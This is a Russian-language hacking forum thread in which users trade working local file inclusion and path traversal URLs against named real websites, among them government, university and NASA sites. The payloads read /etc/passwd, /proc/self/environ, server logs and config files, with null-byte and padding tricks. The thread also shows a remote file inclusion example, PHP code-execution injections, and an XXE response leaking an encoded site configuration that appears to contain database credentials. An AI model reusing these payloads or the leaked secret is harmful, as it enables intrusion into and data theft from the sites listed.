/././././././././././././././././././././././././

проблемный инклуд)

_ttp://www.gk-adept.ru/novosti.php?id=27-30_11_2012%27&id1=../../../../../../etc/passwd%00////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////

_ttp://www.gk-adept.ru/novosti.php?id=27-30_11_2012%27&id1=../../../../../../etc/passwd%00////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////



Смысл слэшов? Если ядовитый ноль и так работает:


_ttp://www.gk-adept.ru/novosti.php?id=27-30_11_2012%27&id1=../../../../../../etc/passwd%00

Верховный Суд Республики Беларусь



h__p://www.sup court .by/cgi-bin/index.cgi?m1=1&m2=1&vd= 7&vm=d&vr=../../../../../../../../../../etc/passwd%00

АПпчхи...


_ttp://www.sofora.ru/landdesign_uslugi_melichimles_polezno.html?id=../../../../../../etc/passwd%00

как-то притихли))


http://www.claudiocauduro.com.br/index1.php?sessoes=../../../../etc/passwd

--дноинжект)


http://www.espaces-transfrontaliers.org/en/cadre.php?page=index&idos=idpoint&idfiche=62'

я хз что чей это сайт , но копирайт у него такой :

Copyright 2008 Tokyo Metropolitan Government All rights reserved.


http://pollen.tokyo-kafun.jp/kafun/index.php?action=../../../../../etc/passwd%00

ННати Вам


http://www.novojogador.com.br/index.php?action=../../../../etc/passwd%00

http://www.villars-burquin.ch/index.php?include=../etc/passwd%00

http://www.parmalat.ro/index.php?include=../../../../../etc/passwd%00

http://www.leciel.ch/index.php?include=../../etc/passwd%00

Добрый день ачат

Держите :


http://staff.science.uva.nl/~rvalenti/index.php?content=../../../../etc/passwd%00

http://www.shodor.org/discretemath/index.php?content=../../../../../etc/passwd%00

(var/log/httpd/access_log%00)http://www.eu-japan-brt.eu/index.php?content=../../../../../etc/passwd%00

http://www.dhsd.limpopo.gov.za/index.php?page=/etc/passwd%00

http://www.gayovich.com.ua/index2.php?link=/etc/passwd%00

Что-то здесь давно меня не было.


http://www.genhound.co.uk/surname_dict.php?inc=../../../../etc/passwd%00

http://www.ltmfg.com/index.php?content=../../../../etc/passwd%00

http://www.winekr.co.kr/mart7/inc.php?inc=../../../../../etc/passwd%00

XXE

http://www.mymetasys.com.br

Request

POST /index.php/api/xmlrpc HTTP/1.1

Host: www.mymetasys.com.br

]>

&xxe;

Response



faultCode620
faultStringMethod "PD94bWwgdmVyc2lvbj0iMS4wIj8+CjwhLS0KLyoqCiAqIE1hZ2 VudG8KICoKICogTk9USUNFIE9GIExJQ0VOU0UKICoKICogVGhp cyBzb3VyY2UgZmlsZSBpcyBzdWJqZWN0IHRvIHRoZSBBY2FkZW 1pYyBGcmVlIExpY2Vuc2UgKEFGTCAzLjApCiAqIHRoYXQgaXMg YnVuZGxlZCB3aXRoIHRoaXMgcGFja2FnZSBpbiB0aGUgZmlsZS BMSUNFTlNFX0FGTC50eHQuCiAqIEl0IGlzIGFsc28gYXZhaWxh YmxlIHRocm91Z2ggdGhlIHdvcmxkLXdpZGUtd2ViIGF0IHRoaX MgVVJMOgogKiBodHRwOi8vb3BlbnNvdXJjZS5vcmcvbGljZW5z ZXMvYWZsLTMuMC5waHAKICogSWYgeW91IGRpZCBub3QgcmVjZW l2ZSBhIGNvcHkgb2YgdGhlIGxpY2Vuc2UgYW5kIGFyZSB1bmFi bGUgdG8KICogb2J0YWluIGl0IHRocm91Z2ggdGhlIHdvcmxkLX dpZGUtd2ViLCBwbGVhc2Ugc2VuZCBhbiBlbWFpbAogKiB0byBs aWNlbnNlQG1hZ2VudG9jb21tZXJjZS5jb20gc28gd2UgY2FuIH NlbmQgeW91IGEgY29weSBpbW1lZGlhdGVseS4KICoKICogRElT Q0xBSU1FUgogKgogKiBEbyBub3QgZWRpdCBvciBhZGQgdG8gdG hpcyBmaWxlIGlmIHlvdSB3aXNoIHRvIHVwZ3JhZGUgTWFnZW50 byB0byBuZXdlcgogKiB2ZXJzaW9ucyBpbiB0aGUgZnV0dXJlLi BJZiB5b3Ugd2lzaCB0byBjdXN0b21pemUgTWFnZW50byBmb3Ig eW91cgogKiBuZWVkcyBwbGVhc2UgcmVmZXIgdG8gaHR0cDovL3 d3dy5tYWdlbnRvY29tbWVyY2UuY29tIGZvciBtb3JlIGluZm9y bWF0aW9uLgogKgogKiBAY2F0ZWdvcnkgICBNYWdlCiAqIEBwYW NrYWdlICAgIE1hZ2VfQ29yZQogKiBAY29weXJpZ2h0ICBDb3B5 cmlnaHQgKGMpIDIwMDggSXJ1YmluIENvbnN1bHRpbmcgSW5jLi BEQkEgVmFyaWVuIChodHRwOi8vd3d3LnZhcmllbi5jb20pCiAq IEBsaWNlbnNlICAgIGh0dHA6Ly9vcGVuc291cmNlLm9yZy9saW NlbnNlcy9hZmwtMy4wLnBocCAgQWNhZGVtaWMgRnJlZSBMaWNl bnNlIChBRkwgMy4wKQogKi8KLS0+Cjxjb25maWc+CiAgICA8Z2 xvYmFsPgogICAgICAgIDxpbnN0YWxsPgogICAgICAgICAgICA8 ZGF0ZT48IVtDREFUQVtUdWUsIDIwIEphbiAyMDA5IDE1OjQ4Oj E0ICswMDAwXV0+PC9kYXRlPgogICAgICAgIDwvaW5zdGFsbD4K ICAgICAgICA8Y3J5cHQ+CiAgICAgICAgICAgIDxrZXk+PCFbQ0 RBVEFbbXltZXRhc3lzXV0+PC9rZXk+CiAgICAgICAgPC9jcnlw dD4KICAgICAgICA8ZGlzYWJsZV9sb2NhbF9tb2R1bGVzPmZhbH NlPC9kaXNhYmxlX2xvY2FsX21vZHVsZXM+CiAgICAgICAgPHJl c291cmNlcz4KICAgICAgICAgICAgPGRiPgogICAgICAgICAgIC AgICAgPHRhYmxlX3ByZWZpeD48IVtDREFUQVtdXT48L3RhYmxl X3ByZWZpeD4KICAgICAgICAgICAgPC9kYj4KICAgICAgICAgIC AgPGRlZmF1bHRfc2V0dXA+CiAgICAgICAgICAgICAgICA8Y29u bmVjdGlvbj4KICAgICAgICAgICAgICAgICAgICA8aG9zdD48IV tDREFUQVtsb2NhbGhvc3RdXT48L2hvc3Q+CiAgICAgICAgICAg ICAgICAgICAgPHVzZXJuYW1lPjwhW0NEQVRBW215bWV0YXN5c1 1dPjwvdXNlcm5hbWU+CiAgICAgICAgICAgICAgICAgICAgPHBh c3N3b3JkPjwhW0NEQVRBW015TWVUQTIxOVBPcnRhbF1dPjwvcG Fzc3dvcmQ+CiAgICAgICAgICAgICAgICAgICAgPGRibmFtZT48 IVtDREFUQVtNeU1ldGFzeXNdXT48L2RibmFtZT4KICAgICAgIC AgICAgICAgICAgICA8YWN0aXZlPjE8L2FjdGl2ZT4KICAgICAg ICAgICAgICAgIDwvY29ubmVjdGlvbj4KICAgICAgICAgICAgPC 9kZWZhdWx0X3NldHVwPgogICAgICAgIDwvcmVzb3VyY2VzPgog ICAgICAgIDxzZXNzaW9uX3NhdmU+PCFbQ0RBVEFbZmlsZXNdXT 48L3Nlc3Npb25fc2F2ZT4KICAgICA8L2dsb2JhbD4KICAgICA8 YWRtaW4+CiAgICAgICAgPHJvdXRlcnM+CiAgICAgICAgICAgID xhZG1pbmh0bWw+CiAgICAgICAgICAgICAgICA8YXJncz4KICAg ICAgICAgICAgICAgICAgICA8ZnJvbnROYW1lPjwhW0NEQVRBW0 15TWFuYWdlcl1dPjwvZnJvbnROYW1lPgogICAgICAgICAgICAg ICAgPC9hcmdzPgogICAgICAgICAgICA8L2FkbWluaHRtbD4KIC AgICAgICA8L3JvdXRlcnM+CiAgICAgPC9hZG1pbj4KPC9jb25m aWc+Cg==" does not exist

kamenergo.su/catalog-in.php?class=1&id=1&number=../../../../../../proc/self/environ%00


1234

Что-то снова тишина... вэйк АП


http://www.ecwatech.ru/2014/index.php?content=../../../../../../../../../../usr/local/apache/logs/access_log%00



http://citypipe.ru/index.php?content=../../../../../../../../../../usr/local/apache/logs/access_log%00

ТИЦ: 20

PR: 3


www.ctt74.[antigoogle]ru/download.php?id=../site/includes.inc.php

Теме ап


http://digitizer.sourceforge.net/index.php?c=../../../../../../etc/passwd%00

http://2013.sibico.com/index.php?content=../../../../../../../../../../etc/passwd%00

http://www.bli.uci.edu/news/news.php?id=../../../../etc/passwd%00

http://debut78.ru/index.php?pages=../../../../../etc/passwd

//нулл байт кто должен добавить? Konqi.

Он не требуется, OxoTnik!

//Warning: include(pages/../../../../../etc/passwd.php) как не требуется? Оо, Konqi

Сижу с FF, когда крутил работал без нул байта, счас просит.... я хз что произошло, но действительно до этого вообще не ставил его. //OxoTnik

Оо, чатик... //BigBear

привет в этом чатиге//

http://kansei.cse.ohio-state.edu/KanseiGenie/Doc/cloning.php?pageName=../../../../../etc/passwd

http://9-9-9.ru/spravka.php?s=../../../../../etc/passwd%00

http://www.dist228.org/index.php?page=/etc/passwd

http://developer.amd.com/wordpress/media/download.php?f=Li4vLi4vd3AtY29uZmlnLnBocA==

обновим тему

http://ultrastar-portal.de/html/scripts/download.php?datei=../../../../../../../../../../etc/passwd

http://ultrastar-portal.de/html/scripts/download.php?datei=/

теме АП


http://museum.nhm.uga.edu/index.php?page=../../../../../etc/passwd%00

http://www.fetakgomo.gov.za/index.php?page=/etc/passwd%00

http://www.evisitanalyst.com/page.php?pgid=../etc/passwd%00

http://votename.ru/site_material.php?id=../../../.htaccess

http://www.andesonline.com/andes_site/index.php?l=../../../../../../../../../../etc/passwd

Доброй ночи всем


http://www.infinitidesign.it/index.php?l=../../../../../../etc/passwd%00

http://www.interuniversidades.com/actions/user/?f=../../../../../../../../../../etc/passwd

http://cms.feasible.ru/?page=
../../../../home/user667/cms.feasible.ru/.htaccess
%00


==========================================

=========================================

http://www.ruscomment.com/view.php?filename=index.php

=========================================

//Ps.Опасные партнеры там.

обновим

тиц:40

pr:2


http://www.nasledie-predkov.ru/index.php?razdel=
../../../../../etc/mysql/my.cnf
%00


===============================================

up


http://www.clan-ai.com/main.php?page=
../../../proc/self/cmdline
%00


===============================================


http://rpggamer.org/main.php?page=
/etc/services


===============================================

pr:5


http://www.co.linn.or.us/index.php?content=
F:\Inetpub\Public\index


=================================================

up

тиц: 150

pr:2


http://www.manowar.ru/autohtml.php?filename=
../.././../../../../../proc/self/cmdline


================================================


http://www.sabers.de/index.php?include=main&content=
../../../../../../../../etc/passwd
%00


================================================

Небольшой up


spainservice.es/index.php?pagina=/../../../../../proc/self/environ/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

User-agent: antiwaf

RFI. Встретил впервый раз. Ковыряйте кому интересно)


http://www.sandeshwala.com/template.php?page=http%3a%2f%2fportswigger.net%2ff 517a2bc19bdff66d7c64e8a7ad2f043.txt

http://www.alinholding.com/index.php?page=/etc/passwd&page_title=home

Сайт стадиона футбольного клуба АПЛ Swansea


http://www.liberty-stadium.com/cms/download.php?download=Download.pdf&source=../../../../../../../../../../etc/passwd

http://www.bruno-groening-film.org/index.php?page=../../../../../../../../../../etc/passwd

http://bestlawyers.ru/php/news/archtem.phtml?id=172&start=11|phpinfo()

http://bestlawyers.ru/php/news/archtem.phtml?id=172&start=11|print(file_get_contents(base64_decode(YXJ jaHRlbS5waHRtbA)))


code exec

http://www.manowar.ru/autohtml.php?filename=../../../../../../../proc/self/status/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

http://cigar-box.de/main.php?page=../../../var/log/apache2/error_log

http://www.lucyporter.co.uk/press/interviews/interviews.php?page=../../../../../../../../../etc/hosts

http://www.love-rat.co.uk/index.php?page=../../../../../../../../../..%2fetc%2fpasswd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

http://www.techmeup.com.au/index.php?page=../../../../etc/passwd%00

http://www.gogaspe.com/index_en.php?page=../pages/links.php/../../../../../../../etc/hosts

NASA

_ttps://claraty.jpl.nasa.gov/man/admin/download.php?file=../../../../..//yam_lite_v1.23/../etc/passwd

pr: 6


http://www.gdnonline.org/sourcebook/chapt/ind.php?id=
../../../../../etc/passwd/././././././[...]././././././


=================================================

http://www.malavolta.com/usato/categoria_annunci.php?intl=/../../../../../../../etc/hosts/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././



http://www.leviedisangiovanni.it/concorso/registrazione_fotografo_en.php?lng=/../../../../../../../etc/passwd%00



http://www.varia-int.com/HC_tapeten_blaetter.php?lng=../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././



http://giperesvet.hut4.ru/index.php?page=../../../../../../../../../../../etc/passwd



http://www.techmeup.com.au/index.php?page=../../../../../../../etc/passwd%00



http://www.deloros-kbr.ru/index.php?Page=../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.



http://kovalyk.com.ua/index.php?page=../../../../../../../../../../proc/self/environ/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././

http://www.siate.ru/index.php?page=../../../../etc/passwd%00

